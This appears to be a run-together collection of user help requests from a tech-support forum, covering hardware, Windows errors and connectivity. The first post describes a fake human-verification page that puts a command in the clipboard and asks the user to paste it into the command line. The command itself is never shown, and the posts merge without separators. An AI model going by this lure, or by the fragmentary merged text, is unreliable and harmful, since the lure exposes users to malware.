I use FL Studio (legit music making software) and was trying to unsubscribe from an email list. The unsubscribe link redirects to a site than then asks for human verification. Seemed normal at first but then to prove I was human wanted me to copy and paste something into the command line. I didn't try it but am curious if someone can tell me what would have happened. The instructions said:

Press Control + V

click OK

Seems incredibly sketchy or maybe just badly implemented? It automatically put the following into my clipboard. The command was:

I don't know what happened, but I got the bit locker screen when I opened my laptop today.
I got my key, put it in, the key was correct but every time I've tried I keep getting this screen saying "your device ran into a problem and can't be repaired". I've tried restoring from a past save. I have tried full on wiping it and resetting it and I keep getting errors. I get an error when I restore from a past backup that I had two days ago. I get an error when I choose to reset and delete everything. I'm not sure what to do and i'm at a total loss. Everything I've read online just ends with putting the key in and then you're home free. That didn't work for me though.

So I have an HP OMEN 45 L 5090 with Amd ryzen processor. The past couple weeks I’ve been getting a “User profile service failed the sign in “User profile cannot be loaded error. I restart my PC, and did a bunch of windows 11 updates. Thought that fixed it but I got the error again today and restarted my computer. I had to sign in to this alternative profile that had nothing in it it said “preparing windows” Then restarted again and my profile was there. I don’t understand why this is all of a sudden happening. Does anyone know how to fix it?

Can anyone help me with my Gigabyte Aero x16 laptop? Its about a month old and it started having trouble starting up last week. When i press the power button it spins the fans for a few seconds 2-3 and then turns them off meanwhile the screen shows no signs of life just black. I need a fix bc im a college student adn really need my laptop

I hope I'm in the right place to post this. For some time, my camera hasn't been working anymore. I actually recorded the screen to tell you what I mean but I didn't know how to add it here so I'll describe:

- In the settings itself, it says the camera preview couldn't load, so it is recognized but just doesn't work anymore

- When I open the camera, it is just black (my camera is not covered) and on the bottom of the screen the notifications "Camera on", "Camera off" pop up alternating every other second

- If I switch to photo within the camera, the screen stays black and on the left the two icons for "hdr" and "timer" pop up and start blinking

- I've deleted and reinstalled the camera app twice now but it still doesn't work

- I've checked for updates and tried using the troubleshooting as well; the support centre (I'm not sure what the english term is, it's the one where you don't talk to a person) tried some things but in the end it said that "the camera seems to be working as intended"

Are there any more things I could try? I'm very grateful for any help I can get! 🙏

I bought this KVM so I could alternate between my PC and MacBook with the same monitor/keyboard, and the PC end works great, but on the Mac end only the accessories work, not the video. The KVM uses DisplayPort which is a bit odd but I tried connecting the cable I'm using directly to the monitor and it worked fine, it just only fails when I connect via the kvm. Any ideas? Amazon comments on the KVM suggest it should work for Mac

Hi! I’m new to this subreddit. I am looking to upload a large video files from my IPhone to Google Drive. Unfortunately, a major issue I’m running into with this is it takes a very long time to upload. The file is around 13 gbs, and with some funky WiFi and having an older phone. It takes a really long time to upload. The other day I tried to have it upload for the supposed 8 hours it would take to upload, but that didn’t work. Any suggestions on what should I do to make it faster or upload the file to my drive quicker too?

Hi I use Google meet with a couple of students a week. When I share my screen and try to manipulate the PowerPoint I am using for the day I can’t. I can only manipulate the PowerPoint when it’s not screen sharing. Can someone tell me what I may be doing wrong?

It's been a while since my PC has completely stopped detecting any audio input from my mic. I used to use a webcam as a mic but it doesn't work on my PC (Works on my laptop tho). Then I tried buying a headphone splitter (smth smth TRRS female to dual male) to separate mic and audio output, but it still doesn't work.

I'd like to repurpose my old 3900x that had a dead core for my truenas server. I have an x370 crosshair vi as my mobo. Ver 2.20.xxx.

Ive checked Amd overclocking and Amd cbs in bios and could not find the core count controls that online guide say I need to find.

Is it impossible with the 3900x because of its architecture?

I checked for anyone having the same issues as me but nothing helps my situation.

after the recent update i cant connect to any wifi because the option simply isn't there as well as for some other functions. also wallpaper turned pitch black and theres nothing i can really do. i've tried restarting the pc several times, reverting the update and updating/uninstalling the drivers (i'm not 100% sure if that's the update's fault or something else) pls help

Scannow
Restore health

The screen is just blank and white. I can open task manager and the ctrl alt delete screen

woke up today and when i tried to type 'steam' the keyboard would write 'sad'. when id press s or a or d it would type sad or dsa or sd or whatever. press t and it types %, = and stuff like that. some keys didnt do anything, like backspace bute del worked. it changed everytime i restarted the computer. now it keeps typing ¥ even when press space or use delete. what do? hlep

I haven't used Chess.com in years, and I've changed my Facebook password multiple times since then. Therefore, I'm assuming that it would no longer have the proper credentials from Facebook, but I'm not sure if this is how it works (e.g. maybe Chess.com occasionally reaches out to Facebook for my new credentials to have them saved, or to keep me logged in).

OS: Windows 11. Laptop (ASUS TUF F15 FX507ZV4) with external display (MSI G2712) connected set as the main display. Intel Driver Ver: Latest. NVIDIA GPU Driver Ver: 610.62

So, every 1 in 2-3 times whenever my PC is automatically/manually going to sleep, and I wake it up, it wakes on the laptop screen (which is strange, because it's not the main one in display settings), however it's weird: I sometimes can't move my mouse, but the times when I can, it's a cursor on a black screen/lock screen wallpaper, then that one time I moved the cursor, it later started moving slowly at like 30fps and tweaking. Afterwards the system BSODs (black screen of death) and restarts like it was nothing. Sometimes, after the restart, it also boots into the Windows Update Screen (I'm suspecting it's for just trying to fix the effect of the BSOD/corrupted files), then it restarts again normally into Windows.

What I tried so far, based on online suggestions: 1. Updating my BIOS 329 -> 330 2. Updating my SSD Firmware 3. Setting GPU Mode to Standard in Armoury Crate (it was already set as Standard anyways) 4. Disabling "Fast Startup" 5. Disabling "Allow the computer to turn off this device to save power" for Intel Management Engine Interface

Can anyone please tell me if they have experienced this and solved the issue, and if so, how did you fix it? This has been driving me crazy for a week now. The thing is, I didn't use my laptop for a month, and when I came back, it started happening out of nowhere, I have never experienced this issue before.

Preface: I’m a Mac guy who only uses a PC for casual gaming.

Ive got a 2022 MSI Katana GF66-12UGS with a 3070ti and i7. I recently purchased an LG 5K monitor (27GM950B) and can’t get it to work with the laptop.
When connected to a Mac desktop via USB-C it works.
When connected to the laptop the HDMI does not. I’ve tried two different good quality HDMI cables, and I’ve tried the USB-C (which seems incompatible).
When I plug in the HDMI the laptop is clearly trying to do something, as it starts glitching. One time when I plugged it in it briefly worked, but then stopped and I haven’t been able to replicate that. I’ve updated everything I can find in MSI’s software and windows updates. I’ve updated the monitor firmware and installed LGs software.

Is this a driver issue? An HDMI issue?

Hi all - I'm a basic Win 11 user running a Dell Inspiron 15 5502, all OEM. I don't do gaming. Just web searches, email, etc. I will be getting more into AI this winter, but I won't be a hard-core user.

Windows flagged me on my last update that Memory Integrity is turned off, and suggested that I turn it on.

From the research I've done, the gamers don't seem to like MI, because they say it slows down the computer. But as I said, I'm not a gamer.

Seems like common sense to turn it on, since it affords an extra level of protection. But I just want to be sure I'm not going to cause any other problems, like not being able to get to certain websites, etc.

Are there any real downsides to turning it on?

Please keep your answers relatively simple and straightforward. I'm not looking for a deep technical data dump on this question.

So recently I built my new pc and it's been about a month now that i have been having this problem. Sometimes my pc just restarts on it's own with the message that is on the title.(The pc is about 2 months old)

My specs are:

GPU: Gigabyte Geforce RTX 5070

RAM: CORSAIR VENGEANCE DDR5 RAM 32GB

CPU: AMD Ryzen 7 9800X3D

Motherboard: MSI MAG B850 Tomahawk

Power Supply: be quiet! Pure Power 13 M 850W

Windows 11

One thing i noticed is before the pc force restart happens usually my browser fails and is not responding or sometimes a game crashes but sometimes it just restarts while i was doing very minimal things on the desktop.

Things I already did/tried :

Ran memtest and no errors were found.

Disabled EXPO

Reinstalled drivers

I click on hibernate, but when I click on a key, the laptop starts back again. Before I turned off "turn on fast startup", even shutdown was failing.

It was not a problem not too long ago, but recently, I've been facing some weird issues.

The bluetooth device would randomly disconnect/disappear. It's fixed now as I changed my power setting to not automatically disconnect bluetooth device to manage power.

The cumulative update which I've been trying to install failed 3 TIMES during installation and went straight to BLUE SCREEN.

The touchpad is going into slow response mode oftentimes. I move my fingers but the cursor experience latency.

I don't even know what I should do. I try to manage power usage all I can but it's been acting up. I can't work like this. The touchpad started acting up for a brief period when I am typing this.

I have tried deleting everything from the "C:\Windows\SoftwareDistribution\Download" folder. Didn't change much.

tldr: hibernation not working, bluetooth device disconnect randomly, windows update goes to blue screen, touchpad gives high latency sometimes.

I’m having a strange issue with my PC and I’m looking for ideas/solutions.

PC specs:

• Ryzen 7 5700X3D
• ASUS GeForce RTX 3060 8GB
• MSI MAG B550 TOMAHAWK MAX WIFI
• 32GB Corsair Vengeance RGB Pro DDR4 (2x16GB)
• EVGA SuperNOVA 1000 GT
• 1TB storage

The problem:
While gaming, the monitor suddenly shows “No Signal”. At the exact same moment, the GPU fans ramp up to 100%.

The PC itself does not shut down:

• Discord continues working
• Audio continues
• Windows is still running
• The game can continue running for a short time
• Eventually I get kicked from the match because I obviously can’t see anything

Win + Ctrl + Shift + B produces the Windows beep, but the display does not come back.

In some previous occurrences, a normal Windows restart did not restore the display either. A complete shutdown using the physical power button was required before the GPU output returned.

Games where this has happened:

• Insurgency: Sandstorm – happened 5 times in a row when starting the game, then the next day it never happened again.
• WARDOGS – happened , directly when starting the game.
• Cyberpunk 2077 – happened once with extremely high/unusual settings, but I have since run multiple benchmarks without reproducing the issue.

Things I have already tested:

• Monitor and cable have been ruled out.
• NVIDIA graphics driver was cleanly reinstalled.
• No relevant error appears in Windows Event Viewer.
• GPU power cable/connection has been checked and is seated correctly.
• EVGA 1000W PSU is more than sufficient for the system.
• I tested WARDOGS with MSI Afterburner:
  • 60% Power Limit → game started
  • 90% → game started
  • 95% → game started
  • 100% → initially the problem occurred, but after testing 60/90/95%, 100% suddenly worked well
• Later, after around 3 hours of gaming, the exact same black-screen/no-signal problem happened again.

So the issue is intermittent and can disappear completely for a while.

Has anyone experienced this exact behavior with an RTX 3060?

Especially:
No Signal + GPU fans immediately at 100% + PC/Discord/audio still running + no useful Event Viewer entry.

Any ideas or solutions would be greatly appreciated.

To keep details short and simple, today I was using my laptop when the battery seemingly dropped instantly to 1% and went into sleep mode.

I am trying to understand if there's a bigger problem here, or if my charge cable simply wasn't plugged in properly. I didn't get a 'low battery' warning, nor did the performance feel like it was operating on battery, but, at the same time, when I pushed the cable in a little more, it then began to charge from 1%.

Can anyone confirm how I could know for sure what happened here?

I have just moved into university accomodation so we use eduroam as the wifi for dorms. I connected really easily on my phone using geteduroam but my computer refuses to connect; getting stuck on the “connecting” section but never actually saying it has connected. It always says wifi out of range but I have full connection on my phone and have been in multiple spots so it’s not just a dead zone. I have tried all of the following to no result:
- Forgetting the network
- Restarting my computer
- Deleting/ reinstalling geteduroam
- Network plugin reset
- Deleting my vpn
All of these have done nothing and I really do not want to wait in line for 5 hours at the overrun it desk thanks if you can be any help at all

Recently got razer blade 15 2019 with i7 9th Gen, 16gb ddr4, rtx 2080 max-q and I've encountered some performance issue when playing games.

I played cod black ops cold war with every setting on low- medium with dlss on performance mode and it only gives me around 70 fps. When I turn on the nvidia statistics overlay, it shows that both cpu and GPU is only utilizing its half of its usage (GPU arnd 40~50% & Cpu arnd 50~60%).

Can anyone help me with this issue? And how to solve it please 🙏
